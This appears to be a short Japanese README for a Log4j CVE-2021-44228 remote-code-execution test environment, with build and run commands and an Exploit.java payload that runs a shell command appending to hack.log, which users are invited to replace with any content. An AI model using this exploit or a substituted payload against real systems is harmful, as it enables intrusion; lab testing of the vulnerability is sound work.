
CVE-2021-44228 Log4j RCE脆弱性のクイックテスト環境。組み込みのエクスプロイトサーバーとカスタマイズ可能なペイロード実行を備えています。
./build.sh
./start-log4j-rce-server.sh
java -cp log4j-rce-1.0-SNAPSHOT-all.jar log4j を実行
カレントフォルダの hack.log にログが出力されるか確認String[] cmds = { "sh", "-c", "echo 'Exploit at '" + getDateString() + " >> ./hack.log" };apache-log4j-poc/src/main/java/Exploit.java 内の
好きな内容に変更し、再ビルドしてテストを実行